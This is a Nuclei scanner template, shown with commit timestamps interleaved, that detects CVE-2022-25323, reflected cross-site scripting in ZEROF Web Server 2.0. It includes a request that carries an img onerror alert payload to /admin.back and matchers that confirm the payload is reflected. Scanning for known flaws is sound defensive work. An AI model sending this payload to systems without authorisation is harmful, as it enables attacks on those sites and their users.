2022-02-19 22:32:01 +00:00
id : CVE-2022-25323
info :
2022-11-28 07:54:38 +00:00
name : ZEROF Web Server 2.0 - Cross-Site Scripting
2022-02-19 22:32:01 +00:00
author : pikpikcu
severity : medium
2022-03-08 01:08:46 +00:00
description : ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 11:59:08 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0.
2022-02-19 22:32:01 +00:00
reference :
2022-02-22 08:39:05 +00:00
- https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
2022-02-19 22:32:01 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-25323
2022-05-17 09:18:12 +00:00
- https://awillix.ru
2022-02-25 18:40:49 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-02-25 18:40:49 +00:00
cve-id : CVE-2022-25323
cwe-id : CWE-79
2023-10-14 11:27:55 +00:00
epss-score : 0.00115
2023-12-12 11:07:52 +00:00
epss-percentile : 0.44915
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : zerof
product : web_server
tags : xss,cve,cve2022,zerof
2022-02-19 22:32:01 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-19 22:32:01 +00:00
- method : GET
path :
2022-02-22 08:39:05 +00:00
- "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"
2022-02-19 22:32:01 +00:00
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-02-22 08:39:05 +00:00
- 'back<img src=x onerror=alert(document.domain)>'
2022-05-12 08:18:54 +00:00
- type : word
part : header
words :
- "text/html"
2022-02-19 22:32:01 +00:00
- type : status
status :
2022-02-19 22:32:56 +00:00
- 401
2023-12-29 09:30:44 +00:00
# digest: 490a00463044022022dd8f33ff1a93b55a44faef5f4615b0c00c6015079ebc203847d507d9b840850220314967d117c1fa1c7b92ba8050fcefb8b08fe19046bfc3000350137010e1dcf3:922c64590222798bb761d5b6d8e72950